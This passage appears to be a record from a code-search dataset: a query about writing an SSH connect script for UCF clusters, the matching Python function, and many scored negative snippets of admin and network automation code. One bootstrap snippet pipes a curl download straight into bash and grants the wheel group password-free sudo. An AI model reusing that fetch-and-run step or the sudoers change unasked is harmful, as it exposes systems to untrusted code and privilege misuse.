[\"vagrant\", \"halt\"]\n cwd = Settings.devbox_folder\n try:\n result = subprocess.check_call(command, cwd=cwd)\n except subprocess.CalledProcessError:\n Utilities.log(\"Could not run 'vagrant halt'.\")\n exit(1)", "def _delete_image_volume(self,\n context: context.RequestContext,\n cache_entry: dict) -> None:\n volume = objects.Volume.get_by_id(context, cache_entry['volume_id'])\n\n # Delete will evict the cache entry.\n self.volume_api.delete(context, volume)", "def database_volume_snapshot_delete(volume_snapshot_uuid):\n db = database_get()\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n query.filter(model.VolumeSnapshot.uuid == volume_snapshot_uuid).delete()\n session.commit()", "def unsetVolume(self):\n return _libsbml.Compartment_unsetVolume(self)", "def hfp_sp_detach(handle, sp_dn):\r\n\r\n sp = handle.query_dn(sp_dn)\r\n if sp is None:\r\n raise ValueError(\"sp does not exist.\")\r\n\r\n sp.host_fw_policy_name = \"\"\r\n handle.set_mo(sp)\r\n handle.commit()\r\n return sp", "def unmount(mount_point):\n # type: (str) -> None\n\n p = subprocess.Popen(['umount', mount_point], stderr=subprocess.PIPE)\n out, err = p.communicate()\n if p.returncode > 0:\n raise OSError(err)\n else:\n os.rmdir(mount_point)", "def UnlockVolume(self, uuid, passphrase):\n if not util.UuidIsValid(uuid):\n raise storage.InvalidUUIDError('Invalid UUID: ' + uuid)\n returncode, _, stderr = util.Exec(\n (DISKUTIL, 'apfs', 'unlockVolume', uuid, '-stdinpassphrase'),\n stdin=passphrase)\n if (returncode != 0 and\n 'volume is not locked' not in stderr and\n 'is already unlocked' not in stderr):\n raise storage.CouldNotUnlockError(\n 'Could not unlock volume (%s).' 
% returncode)", "def destroy():\n\n # Stop the program if no init has occurred.\n Vagrant.stop_if_not_init()\n\n # Run vagrant destroy from the vagrant folder.\n command = [\"vagrant\", \"destroy\"]\n cwd = Settings.devbox_folder\n try:\n result = subprocess.check_call(command, cwd=cwd)\n except subprocess.CalledProcessError:\n Utilities.log(\"Could not run 'vagrant destroy'.\")\n exit(1)" ]
[ "0.8114062", "0.80263144", "0.7928212", "0.77187544", "0.76588297", "0.7626845", "0.7559527", "0.7490584", "0.74343324", "0.73547065", "0.73352516", "0.73352516", "0.732464", "0.7162539", "0.70716673", "0.7023439", "0.69156", "0.69056416", "0.67387044", "0.6652363", "0.66444236", "0.6607345", "0.65973073", "0.6549967", "0.63368994", "0.6331089", "0.6248447", "0.62060887", "0.6149829", "0.6038843", "0.60388106", "0.6031579", "0.6024765", "0.6022758", "0.600527", "0.5990041", "0.5958379", "0.5952596", "0.59362334", "0.59343463", "0.58978426", "0.58839476", "0.58734274", "0.5866238", "0.58645195", "0.58139503", "0.58006185", "0.57983893", "0.57957673", "0.57902026", "0.57679063", "0.57679063", "0.57599676", "0.5750238", "0.57316244", "0.5701144", "0.56620204", "0.5654828", "0.56446195", "0.5635655", "0.5623229", "0.56232184", "0.56215143", "0.5585304", "0.5584901", "0.55541223", "0.55345833", "0.5527308", "0.55226856", "0.55179244", "0.5516982", "0.55109113", "0.551091", "0.55018455", "0.54988027", "0.54885316", "0.5488024", "0.54868704", "0.5474821", "0.54703987", "0.54694206", "0.5469282", "0.54586554", "0.5451474", "0.54469544", "0.5436312", "0.5431075", "0.5428319", "0.5427472", "0.542554", "0.5419662", "0.54155946", "0.5411733", "0.5402684", "0.5400282", "0.53906727", "0.5388984", "0.53836", "0.5381525", "0.5379315" ]
0.74771315
8
This module creates a bash file to connect to the UCF clusters
def connect(directory_1, directory_2, key_address, user, server):
    import os

    # Creates a list of files in the working directory
    files = os.listdir()

    # If the bash file already exists, it deletes the bash file before making progress
    if 'connect.sh' in files:
        os.remove('connect.sh')
    else:
        pass

    with open('connect.sh', 'w') as f:
        f.write('#!/bin/bash\n')
        f.write('ssh -Y -i ' + str(key_address) + ' ' + str(user) + \
                '@' + str(server))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main():\n mvip, user, user_pass, mvip_node = get_inputs()\n headers, url = build_auth(mvip, user, user_pass, mvip_node)\n payload = build_payload()\n response_json = connect_cluster(headers, url, payload)\n account_table = create_table(response_json)\n print(account_table)", "def main():\n\n # Handling arguments\n args = get_args()\n all_clusters = args.all_clusters\n all_datacenters = args.all_datacenters\n all_hosts = args.all_hosts\n clusters = []\n if args.clusters:\n clusters = args.clusters\n debug = args.debug\n allow_fqdn = args.allow_fqdn\n datacenters = []\n if args.datacenters:\n datacenters = args.datacenters\n hosts = []\n if args.hosts:\n hosts = args.hosts\n host_configure_agent = args.host_configure_agent\n hosts_file = None\n if args.hosts_file:\n hosts_file = args.hosts_file\n hv_username = None\n if args.hv_username:\n hv_username = args.hv_username\n hv_password = None\n if args.hv_password:\n hv_password = args.hv_password\n hv_management_network = None\n if args.hv_management_network:\n hv_management_network = args.hv_management_network\n hv_data_network = None\n if args.hv_data_network:\n hv_data_network = args.hv_data_network\n hv_vm_network = None\n if args.hv_vm_network:\n hv_vm_network = args.hv_vm_network\n hv_mc_network = None\n if args.hv_mc_network:\n hv_mc_network = args.hv_mc_network\n log_file = None\n if args.logfile:\n log_file = args.logfile\n nuage_enterprise = args.nuage_enterprise\n nuage_host = args.nuage_host\n nuage_port = args.nuage_port\n nuage_password = None\n if args.nuage_password:\n nuage_password = args.nuage_password\n nuage_username = args.nuage_username\n nuage_vrs_ovf = None\n if args.nuage_vrs_ovf:\n nuage_vrs_ovf = args.nuage_vrs_ovf\n nosslcheck = args.nosslcheck\n verbose = args.verbose\n vcenter_host = args.vcenter_host\n vcenter_name = vcenter_host\n if args.vcenter_name:\n vcenter_name = args.vcenter_name\n vcenter_https_port = args.vcenter_https_port\n vcenter_http_port = args.vcenter_http_port\n vcenter_password = None\n if args.vcenter_password:\n vcenter_password = args.vcenter_password\n vcenter_username = args.vcenter_username\n\n # Logging settings\n if debug:\n log_level = logging.DEBUG\n elif verbose:\n log_level = logging.INFO\n else:\n log_level = logging.WARNING\n\n logging.basicConfig(filename=log_file, format='%(asctime)s %(levelname)s %(message)s', level=log_level)\n logger = logging.getLogger(__name__)\n\n # Input checking\n if not all_datacenters and len(datacenters) < 1:\n logger.critical('Not all datacenters have to be present in the Nuage Deployment tool (--all-datacenters option NOT enabled), but also no datacenters specified (at least one --datacenter)')\n return 1\n if not all_clusters and len(clusters) < 1:\n logger.critical('Not all clusters have to be present in the Nuage Deployment tool (--all-clusters option NOT enabled), but also no clusters specified (at least one --cluster)')\n return 1\n if not all_hosts and len(hosts) < 1 and not hosts_file:\n logger.critical('Not all hosts have to be present in the Nuage Deployment tool (--all-hosts option NOT enabled), but also no hosts specified (at least one --host or specify a file with the host information via --hosts-file)')\n return 1\n if all_datacenters and len(datacenters) > 0:\n logger.warning('You enabled all datacenters and added individual datacenter options, --all-datacenters takes precendence and overwrites the specified datacenters.')\n datacenters = []\n if all_clusters and len(clusters) > 0:\n logger.warning('You enabled all clusters 
and added individual cluster options, --all-clusters takes precendence and overwrites the specified clusters.')\n clusters = []\n if all_hosts and len(hosts) > 0 and not hosts_file:\n logger.warning('You enabled all hosts and added individual hosts options, --all-hosts takes precendence and overwrites the specified hosts.')\n hosts = []\n elif all_hosts and len(hosts) < 1 and hosts_file:\n logger.warning('You enabled all hosts and provided a hosts file, the hosts file takes precendence over the --all-hosts flag and this flag will be ignored.')\n all_hosts = False\n elif not all_hosts and len(hosts) > 0 and hosts_file:\n logger.warning('You specified host with the --host argument and provided a hosts file, the hosts file takes precendence over the --host paramerters and these will be ignored.')\n hosts = []\n\n # CSV Handling\n hosts_list = None\n if hosts_file:\n hosts_list = {}\n # CSV fields:\n # VM Name, Resource Pool, Folder, MAC Address, Post Script\n logger.debug('Parsing csv %s' % hosts_file)\n\n if not os.path.isfile(hosts_file):\n logger.critical('CSV file %s does not exist, exiting' % hosts_file)\n return 1\n\n with open(hosts_file, 'rb') as hostlist:\n hosts_list_raw = csv.reader(hostlist, delimiter=',', quotechar='\"')\n for row in hosts_list_raw:\n logger.debug('Found CSV row: %s' % ','.join(row))\n # Adding IP to the hosts variable so it can also be used in further handling if it's a valid IP\n if allow_fqdn or ip_address_is_valid(row[0]):\n hosts_list[row[0]] = row\n hosts.append(row[0])\n else:\n logger.warning('Found an invalid IP %s in the hosts file and FQDNs are not allowed, skipping line' % row[0])\n\n # Getting user password for Nuage connection\n if nuage_password is None:\n logger.debug('No command line Nuage password received, requesting Nuage password from user')\n nuage_password = getpass.getpass(prompt='Enter password for Nuage host %s for user %s: ' % (nuage_host, nuage_username))\n\n # Getting user password for vCenter connection\n if vcenter_password is None:\n logger.debug('No command line vCenter password received, requesting vCenter password from user')\n vcenter_password = getpass.getpass(prompt='Enter password for vCenter host %s for user %s: ' % (vcenter_host, vcenter_username))\n\n # Getting user password for hosts\n if hv_password is None:\n logger.debug('No command line Host password received, requesting Host password from user')\n hv_password = getpass.getpass(prompt='Enter password for the hosts inside vCenter %s for user %s: ' % (vcenter_host, hv_username))\n\n try:\n vc = None\n nc = None\n\n # Connecting to Nuage\n try:\n logger.info('Connecting to Nuage server %s:%s with username %s' % (nuage_host, nuage_port, nuage_username))\n nc = vsdk.NUVSDSession(username=nuage_username, password=nuage_password, enterprise=nuage_enterprise, api_url=\"https://%s:%s\" % (nuage_host, nuage_port))\n nc.start()\n except IOError:\n pass\n\n if not nc or not nc.is_current_session():\n logger.error('Could not connect to Nuage host %s with user %s and specified password' % (nuage_host, nuage_username))\n return 1\n\n # Connecting to vCenter\n try:\n logger.info('Connecting to vCenter server %s:%s with username %s' % (vcenter_host, vcenter_https_port, vcenter_username))\n if nosslcheck:\n vc = SmartConnectNoSSL(host=vcenter_host, user=vcenter_username, pwd=vcenter_password, port=int(vcenter_https_port))\n else:\n vc = SmartConnect(host=vcenter_host, user=vcenter_username, pwd=vcenter_password, port=int(vcenter_https_port))\n\n except IOError:\n pass\n\n if not vc:\n 
logger.error('Could not connect to vCenter host %s with user %s and specified password' % (vcenter_host, vcenter_username))\n return 1\n\n logger.debug('Registering vCenter disconnect at exit')\n atexit.register(Disconnect, vc)\n\n logger.info('Connected to both Nuage & vCenter servers')\n\n # Check if the vCenter exists in Nuage vCenter Deployment Tool\n nuage_vcenter = None\n logger.debug('Checking if vCenter %s is already present in Nuage vCenter Deployment Tool' % vcenter_name)\n for nvc in nc.user.vcenters.get():\n if nvc.ip_address == vcenter_host:\n logger.debug('Found vCenter %s, not recreating' % vcenter_name)\n nuage_vcenter = nvc\n break\n\n # If th vCenter does not exist in Nuage vCenter Deployment Tool, create it\n if not nuage_vcenter:\n logger.debug('vCenter %s with IP %s not found in the Nuage vCenter Deployment Tool, creating' % (vcenter_name, vcenter_host))\n nuage_vcenter = vsdk.NUVCenter(name=vcenter_name, ip_address=vcenter_host, user_name=vcenter_username, password=vcenter_password, http_port=vcenter_http_port, https_port=vcenter_https_port, ovf_url=nuage_vrs_ovf)\n nc.user.create_child(nuage_vcenter)\n logger.info('Created vCenter %s in the Nuage vCenter Deployment Tool' % vcenter_name)\n\n # Datacenter Handling\n # Gathering all Datacenters inside the vCenter\n logger.debug('Gathering all Datacenters from vCenter')\n content = vc.content\n obj_view = content.viewManager.CreateContainerView(content.rootFolder, [vim.Datacenter], True)\n vc_dc_list = obj_view.view\n obj_view.Destroy()\n\n # Gathering all Datacenters inside the Nuage vCenter\n logger.debug('Gathering all Datacenter from the Nuage vCenter entry')\n nc_dc_list = nuage_vcenter.vcenter_data_centers.get()\n\n # Parsing all datacenters\n for vc_dc in vc_dc_list:\n if all_datacenters or vc_dc.name in datacenters:\n logger.debug('vCenter Datacenter %s is in list that has to be present in the Nuage vCenter Deployment Tool, checking if it already exists.' 
% vc_dc.name)\n handle_vdt_datacenter(logger=logger, nc=nc, vc=vc, nuage_vcenter=nuage_vcenter, vc_dc=vc_dc, nc_dc_list=nc_dc_list, vcenter_name=vcenter_name, all_clusters=all_clusters, all_hosts=all_hosts, clusters=clusters, hosts=hosts, hosts_list=hosts_list, hv_username=hv_username, hv_password=hv_password, hv_management_network=hv_management_network, hv_data_network=hv_data_network, hv_vm_network=hv_vm_network, hv_mc_network=hv_mc_network, host_configure_agent=host_configure_agent, allow_fqdn=allow_fqdn)\n\n logger.info('Completed all tasks.')\n return 0\n\n except vmodl.MethodFault as e:\n logger.critical('Caught vmodl fault: %s' % e.msg)\n return 1\n except Exception as e:\n logger.critical('Caught exception: %s' % str(e))\n return 1", "def main():\r\n mvip, user, user_pass, mvip_node = get_inputs()\r\n payload = build_payload()\r\n headers, url = build_auth(mvip, user, user_pass, mvip_node)\r\n response_json = connect_cluster(headers, url, payload)\r\n paired_vols = get_replication_status(response_json)\r\n payload = get_vol_stats(paired_vols)\r\n response_json = connect_cluster(headers, url, payload)\r\n parse_volume_stats(paired_vols, response_json)", "def main():\n module = AnsibleModule(\n argument_spec=dict(\n pn_cliusername=dict(required=False, type='str'),\n pn_clipassword=dict(required=False, type='str', no_log=True),\n pn_switch_list=dict(required=False, type='list', default=[]),\n )\n )\n\n global CHANGED_FLAG\n results = []\n message = ''\n switch_list = module.params['pn_switch_list']\n\n # Create cluster\n if len(switch_list) == 2:\n message += create_cluster(module, switch_list)\n\n for switch in switch_list:\n replace_string = switch + ': '\n for line in message.splitlines():\n if replace_string in line:\n results.append({\n 'switch': switch,\n 'output': (line.replace(replace_string, '')).strip()\n })\n\n # Exit the module and return the required JSON.\n module.exit_json(\n unreachable=False,\n msg='cluster creation succeeded',\n summary=results,\n exception='',\n failed=False,\n changed=True if True in CHANGED_FLAG else False,\n task='Create clusters'\n )", "def main():\n cli(\n auto_envvar_prefix='CFN',\n prog_name='cfn-cli'\n )", "def setup(ctx, cluster_url):\n if ctx.obj[\"debug\"]:\n click.echo(\"Debug mode initiated\")\n set_trace()\n\n logger.debug(\"cluster setup subcommand\")", "def main():\n\n ericsson_connect = {\n \"device_type\": \"ericsson_ipos\",\n \"ip\": \"1.1.1.1\",\n \"username\": \"admin\",\n \"password\": \"admin\",\n }\n\n net_connect = ConnectHandler(**ericsson_connect)\n output = net_connect.send_command(\"show ip int brief\")\n print(output)\n\n output_commit = net_connect.commit()\n print(output_commit)", "def main():\n\n\n fab_list = get_fabric_list(SANNAV_IP_ADDRESS, SANNAV_FOS_USERNAME, SANNAV_FOS_PASSWORD)\n\n # Print all known facts about the fabrics and the switches\n # Comment out this print statement if this code will be used to generate\n # an Ansible Tower inventory.\n print(json.dumps(fab_list))\n\n # This section of code formats the results to be in a format acceptable to Ansible Tower (awx).\n # To use it, unblock the following block of code and comment out the preceeding print statement.\n\n _ = \"\"\"\n toAwx = {'_meta': {'hostvars': {}}}\n\n for fabric in fab_list[\"Fabrics\"]:\n toAwx[fabric[\"name\"]] = { 'hosts': []}\n for switch in fabric[\"Switches\"]:\n toAwx[fabric[\"name\"]]['hosts'].append(switch['ipAddress'])\n print(json.dumps(toAwx));\n \"\"\"", "def connect_to_master():", "def main():\n config = 
configparser.ConfigParser()\n config.read('dwh.cfg')\n host = config.get(\"CLUSTER\",\"HOST\")\n dbname = config.get(\"CLUSTER\",\"DB_NAME\")\n user = config.get(\"CLUSTER\",\"DB_USER\")\n password = config.get(\"CLUSTER\",\"DB_PASSWORD\")\n port = config.get(\"CLUSTER\",\"DB_PORT\")\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(host,\n dbname,\n user,\n password,\n port))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def bootstrap():\n validate_configurator_version()\n\n # put new mkinitcpio.conf in place\n run(\"mv /etc/mkinitcpio.conf.pacnew /etc/mkinitcpio.conf\")\n sed(\"/etc/mkinitcpio.conf\",\n 'MODULES=\"\"',\n 'MODULES=\"xen-blkfront xen-fbfront xen-kbdfront xen-netfront xen-pcifront xenbus_probe_frontend xenfs\"') # nopep8\n sed(\"/etc/mkinitcpio.conf\",\n 'HOOKS=\"base udev autodetect modconf block filesystems keyboard fsck',\n 'HOOKS=\"base udev block filesystems shutdown autodetect\"')\n\n # upgrade pacakges\n run(\"pacman --noconfirm -Syu\")\n\n # put new pacman.conf in place\n run(\"mv /etc/pacman.conf.pacnew /etc/pacman.conf\")\n\n # install essential packages\n run(\"pacman --noconfirm -S base-devel\")\n run(\"pacman --noconfirm -S curl git rsync\")\n\n # create a user, named 'aur', to safely install AUR packages under fakeroot\n # uid and gid values auto increment from 1000\n # to prevent conficts set the 'aur' user's gid and uid to 902\n run(\"groupadd -g 902 aur && useradd -m -u 902 -g 902 -G wheel aur\")\n\n # allow users in the wheel group to sudo without a password\n uncomment(\"/etc/sudoers\", \"wheel.*NOPASSWD\")\n\n # install yaourt and upgrade non-pacman rackspace installed packages\n sudo(\"rm -rf /home/aur/.builds && mkdir /home/aur/.builds/\", user=\"aur\")\n with cd(\"/home/aur/.builds/\"):\n sudo(\"bash <(curl aur.sh) -si --noconfirm package-query yaourt\", user=\"aur\")\n sudo(\"yaourt --noconfirm -S xe-guest-utilities\", user=\"aur\")\n\n # allow fabric to sftp with contrib.files.put\n # http://stackoverflow.com/questions/10221839/cant-use-fabric-put-is-there-any-server-configuration-needed # nopep8\n # change before reboot because then the sshd config will be reloaded\n # sed(\"/etc/ssh/sshd_config\", \"Subsystem sftp /usr/lib/openssh/sftp-server\",\n # \"Subsystem sftp internal-sftp\")\n\n # systemd\n sed(\"/boot/grub/menu.lst\",\n \"kernel /boot/vmlinuz-linux root=/dev/xvda1 ro console=hvc0\",\n \"kernel /boot/vmlinuz-linux root=/dev/xvda1 ro console=hvc0 init=/usr/lib/systemd/systemd\")\n reboot()\n if not contains(\"/proc/1/comm\", \"systemd\"):\n abort(\"systemd is not installed properly\")\n server = [s for s in env.bootmachine_servers if s.public_ip == env.host][0]\n run(\"hostnamectl set-hostname {0}\".format(server.name))\n run(\"mv /etc/locale.gen.pacnew /etc/locale.gen.conf\")\n uncomment(\"/etc/locale.gen\", \"en_US.UTF-8 UTF-8\")\n uncomment(\"/etc/locale.gen\", \"en_US ISO-8859-1\")\n run(\"locale-gen\")\n run(\"localectl set-locale LANG='en_US.utf8'\")\n run(\"timedatectl set-timezone US/Central\")", "def main(args):\n # Getting the missing parameters, if any.\n if not args.username:\n args.username = raw_input(\"Please enter username: \")\n if not args.password:\n args.password = getpass(\"Please enter password: \")\n if not args.filename:\n args.filename = raw_input(\"Please enter filename: \")\n # Reading file.\n nodes = read_file(args.filename)\n # Open the vars file.\n vars_file = open(\"./roles/router/vars/main.yml\", 'a')\n # Obtaining loopback 
information.\n neighbors = {\"cisco\" : \"\", \"juniper\" : \"\", \"vyatta\" : \"\" }\n cisco, cisco_as = CiscoLoopback()\n juniper, juniper_as = JuniperLoopback()\n vyatta, vyatta_as = VyattaLoopback()\n # Obtaining neighbors information.\n cisco_ne = Neighbors(\"cisco\")\n juniper_ne = Neighbors(\"juniper\")\n vyatta_ne = Neighbors(\"vyatta\")\n # Starting to buil the file's schema.\n cisco_vars = CISCOTEMPLATE % (cisco_as)\n vars_file.write(cisco_vars)\n for interface in cisco:\n a = CISCOLOOPBACK % (interface, cisco[interface][\"address\"], cisco[interface][\"network\"], cisco[interface][\"mask\"])\n vars_file.write(a)\n\n vars_file.write(CISCONEIGHBORS)\n for neighbor in cisco_ne:\n if neighbor == \"cisco\":\n for element in cisco_ne[neighbor]:\n a = NEIGHBORS % (element, cisco_ne[neighbor][element])\n vars_file.write(a)\n\n juniper_vars = JUNIPERTEMPLATE % (juniper_as)\n vars_file.write(juniper_vars)\n for interface in juniper:\n a = LOOPBACK % (interface, juniper[interface][\"address\"], juniper[interface][\"network\"])\n vars_file.write(a)\n vars_file.write(JUNIPERNEIGHBORS)\n for neighbor in juniper_ne:\n if neighbor == \"juniper\":\n for element in juniper_ne[neighbor]:\n a = NEIGHBORS % (element, juniper_ne[neighbor][element])\n vars_file.write(a)\n\n vyatta_vars = VYATTATEMPLATE % (vyatta_as)\n vars_file.write(vyatta_vars)\n for interface in vyatta:\n a = LOOPBACK % (interface, vyatta[interface][\"address\"], vyatta[interface][\"network\"])\n vars_file.write(a)\n vyatta_neighbors_var = VYATTANEIGHBORS\n vars_file.write(vyatta_neighbors_var)\n for neighbor in vyatta_ne:\n if neighbor == \"vyatta\":\n for element in vyatta_ne[neighbor]:\n a = NEIGHBORS % (element, vyatta_ne[neighbor][element])\n vars_file.write(a)\n # Closing and saving the file.\n vars_file.close()\n\n time.sleep(2)\n # Generating the templates.\n os.system(\"ansible-playbook site.yml\")\n time.sleep(2)\n # Loading cisco configuration.\n try:\n with open(\"cisco_template.txt\", 'r') as f:\n cisco_template = f.read()\n except IOError:\n print \"File cisco_template does not exist!\"\n # Loading Juniper configuration.\n try:\n with open(\"juniper_template.txt\", 'r') as f:\n juniper_template = f.read()\n except IOError:\n print \"File juniper_template does not exist!\"\n # Loading Vyatta configuration.\n try:\n with open(\"vyatta_template.txt\", 'r') as f:\n vyatta_template = f.read()\n except IOError:\n print \"File vyatta_template does not exist!\"\n # Configuring the devices.\n for device in nodes:\n if nodes[device][\"platform\"] == \"CiscoIOS\":\n run_commands(nodes[device][\"ipv4_address\"], args.username, args.password, cisco_template, platform=\"cisco\")\n print \"***CISCO CONFIGURATION COMPLETED***\"\n elif nodes[device][\"platform\"] == \"Juniper\":\n run_commands(nodes[device][\"ipv4_address\"], args.username, args.password, juniper_template, platform=\"juniper\")\n print \"***JUNIPER CONFIGURATION COMPLETED***\"\n else:\n run_commands(nodes[device][\"ipv4_address\"], args.username, args.password, vyatta_template, platform=\"vyatta\")\n print \"***VYATTA CONFIGURATION COMPLETED***\"", "def connect_subproc():\n return factory.connect_subproc([sys.executable, \"-u\", SERVER_FILE, \"-q\", \"-m\", \"stdio\"], \n SlaveService)", "def main():\r\n parser = argparse.ArgumentParser(description=\"\"\"Starts SSH session with one\r\n of ARC\\'s Raspberrypis.\"\"\")\r\n\r\n parser.add_argument('usr', help='Username for the remote device.')\r\n parser.add_argument('pwd', help='Password for 
arc.pi.reg@gmail.com.')\r\n\r\n args = parser.parse_args()\r\n\r\n address = get_IP(IP_list(args.pwd), args.usr)\r\n os.system(\"ssh \" + \"pi\" + \"@\" + address)", "def main():\n\n # Handling arguments\n args = get_args()\n debug = args.debug\n log_file = None\n if args.logfile:\n log_file = args.logfile\n nuage_enterprise = args.nuage_enterprise\n nuage_host = args.nuage_host\n nuage_port = args.nuage_port\n nuage_password = None\n if args.nuage_password:\n nuage_password = args.nuage_password\n nuage_username = args.nuage_username\n# nosslcheck = args.nosslcheck\n verbose = args.verbose\n fip_net = args.fip_net\n uplink_addr = args.uplink_addr\n uplink_mask = args.uplink_mask\n uplink_gw = args.uplink_gw\n uplink_ip = args.uplink_ip\n uplink_mac = args.uplink_mac\n gw_name = args.gw_name\n gw_port = args.gw_port\n gw_vlan = args.gw_vlan\n\n # Logging settings\n if debug:\n log_level = logging.DEBUG\n elif verbose:\n log_level = logging.INFO\n else:\n log_level = logging.WARNING\n\n logging.basicConfig(filename=log_file, format='%(asctime)s %(levelname)s %(message)s', level=log_level)\n logger = logging.getLogger(__name__)\n\n # Getting user password for Nuage connection\n if nuage_password is None:\n logger.debug('No command line Nuage password received, requesting Nuage password from user')\n nuage_password = getpass.getpass(prompt='Enter password for Nuage host %s for user %s: ' % (nuage_host, nuage_username))\n\n try:\n # Connecting to Nuage\n logger.info('Connecting to Nuage server %s:%s with username %s' % (nuage_host, nuage_port, nuage_username))\n nc = vsdk.NUVSDSession(username=nuage_username, password=nuage_password, enterprise=nuage_enterprise, api_url=\"https://%s:%s\" % (nuage_host, nuage_port))\n nc.start()\n\n except Exception as e:\n logger.error('Could not connect to Nuage host %s with user %s and specified password' % (nuage_host, nuage_username))\n logger.critical('Caught exception: %s' % str(e))\n return 1\n\n nuage_user = nc.user\n\n\n # Getting the parentID of FIP subnet\n logger.debug('Getting FIP subnet parent ID')\n fip_obj = nuage_user.subnets.get_first(filter=\"address == '{0}'\".format(fip_net))\n \n # Fail if FIP subnet object was not found\n if not fip_obj:\n logger.critical('FIP subnet {0} was not found'.format(fip_net))\n return 1\n\n shared_resource_id = fip_obj.parent_id\n logger.debug('FIP parent ID is: {0}'.format(shared_resource_id))\n\n\n # Locating a gateway port and creating a new VLAN\n logger.debug('Creating a new VLAN on Gateway port')\n new_vlan = vsdk.NUVLAN(value=gw_vlan)\n gw = nuage_user.gateways.get_first(filter=\"name == '{0}'\".format(gw_name))\n\n # Fail if Gateway was not found\n if not gw:\n logger.critical('Gateway {0} was not found'.format(gw_name))\n return 1\n\n port = gw.ports.get_first(filter=\"name == '{0}'\".format(gw_port))\n\n # Fail if Port requirements are not met\n if not port:\n logger.critical('Port {0} was not found on Gateway {1}'.format(gw_port, gw_name))\n return 1\n elif not port.port_type == 'ACCESS':\n logger.critical('Port {0} is not an ACCESS port type'.format(gw_port))\n return 1\n elif not int(gw_vlan) in range(*[int(x) for x in port.vlan_range.split('-')]):\n logger.critical('Vlan {0} is not part of the port vlan range: {1}'.format(gw_vlan, port.vlan_range))\n return 1\n elif port.vlans.get_first(filter=\"value == {0}\".format(gw_vlan)):\n logger.critical('Vlan {0} already exists on port {1}'.format(gw_vlan, gw_port))\n return 1\n\n port.create_child(new_vlan)\n vlan_id = new_vlan.id\n logger.debug('New 
VLAN ID is: {0}'.format(vlan_id))\n\n\n # Constructing an Uplink Subnet object\n logger.debug('Creating an Uplink Subnet')\n shared_subnet = vsdk.NUSharedNetworkResource(name='uplink subnet {0}'.format(uplink_addr.replace('.','-')), \\\n description='Uplink subnet to Gateway {0}'.format(gw_name.replace('.','-')), \\\n address=uplink_addr, \\\n netmask=uplink_mask, \\\n gateway=uplink_gw, \\\n type=UPLINK_TYPE, \\\n uplink_interface_ip=uplink_ip, \\\n uplink_interface_mac=uplink_mac, \\\n uplink_gw_vlan_attachment_id=vlan_id, \\\n shared_resource_parent_id=shared_resource_id, \\\n uplink_vport_name = 'uplink vport {0} Vlan{1}'.format(gw_port, gw_vlan))\n\n # Creating a subnet on VSD\n nuage_user.create_child(shared_subnet)\n\n logger.info('Uplink Subnet is created')\n return 0", "def main():\n rs = redshift(config_file=CONFIG_FILENAME)\n \n # check if cluster already available\n try:\n clust_avail = check_available(rs)\n except rs_client.exceptions.ClusterNotFoundFault:\n clust_avail = False\n\n # if cluster not available, create it\n if not clust_avail:\n create_cluster(rs) \n \n print(f'Cluster is available. Cluster information: \\n{rs.get_cluster_info()}')", "def main():\n # Set these to your own details.\n myssh = connect('example.com')\n myssh.put('ssh.py')\n myssh.close()", "def main(password=PASSWORD):\n global c\n print('[+] Connecting to \"{}\" ... '.format(ADDRESS))\n c = fc.FritzConnection(address=ADDRESS, password=password)\n\n # check connection by getting DeviceInfo\n try:\n print('[+] Connected to ', c.call_action('DeviceInfo:1', 'GetInfo')['NewModelName'])\n except Exception as e:\n print('[-] Could not connect!')\n print(e)\n exit(1)", "def setupMonti():\n #Update /etc/hosts with mongo-server and management-engine nodes\n sudo(\"apt-get install zookeeper\")\n sudo(\"apt-get install zookeeperd\")\n sudo(\"pip2 install chariot-runtime\")\n #update configuration file located in /etc/chariot/chariot.conf\n run (\"cd /etc/init.d && sudo update-rc.d chariot-nmw defaults 99\")\n sudo(\"reboot\")", "def main():\n with Scrapli(**MY_DEVICE) as conn:\n print(conn.get_prompt())\n print(conn.send_command(\"show run | i hostname\").result)", "def main():\n\n global _VEHICLECLIENT\n\n logfiles.create_application_log(_LOGGER)\n _LOGGER.info(f\"Ford Connect trip log utility {version.get_version()}\")\n\n config = read_config()\n if not config:\n _LOGGER.error(\"Error processing YAML configuration - exiting\")\n return\n\n fordconnect = config.get('fordconnect')\n _VEHICLECLIENT = Vehicle(\n username=fordconnect.get('username'),\n password=fordconnect.get('password'),\n vin=fordconnect.get('vin'),\n )\n\n tripLogs = get_triplogs()\n _LOGGER.info(f\"Trip logs: {tripLogs}\")", "def make_xfer_config(hostname, identfile, user='root'):\n xc = \"\"\n xc += \"Host %s\\n\" % (hostname)\n xc += \"Hostname %s\\n\" % (hostname)\n xc += \"User %s\\n\" % (user)\n xc += \"IdentityFile %s\\n\" % (identfile)\n xc += \"Compression yes\\n\"\n xc += \"StrictHostKeyChecking no\\n\"\n xc += \"UserKnownHostsFile /dev/null\\n\"\n return xc", "def localhost():\n env.run = local\n env.cd = lcd\n env.deployment = 'local'", "def main():\n # kickoff The Norn\n nr = kickoff()\n\n # enable SCP\n c_print(f\"Enabling SCP for NAPALM on all devices\")\n # run The Norn to enable SCP\n nr.run(task=scp_enable)\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # gather switch info\n c_print(\"Gathering device configurations\")\n # run The Norn to get info\n nr.run(task=get_info)\n # print failed 
hosts\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # render switch configs\n c_print(f\"Rendering IBNS dot1x configurations\")\n # run The Norn to render dot1x config\n nr.run(task=render_configs)\n # print failed hosts\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # apply switch configs\n c_print(f\"Applying IBNS dot1x configuration files to all devices\")\n # prompt to proceed\n proceed()\n # run The Norn to apply config files\n nr.run(task=apply_configs)\n # print failed hosts\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # verify dot1x configs\n c_print(f\"Verifying IBNS dot1x configuration of all devices\")\n # run The Norn to verify dot1x config\n nr.run(task=verify_dot1x, num_workers=1)\n # print failed hosts\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # disable SCP\n c_print(f\"Disabling SCP server on all devices\")\n # prompt to proceed\n proceed()\n # run The Norn to disable SCP and save configs\n 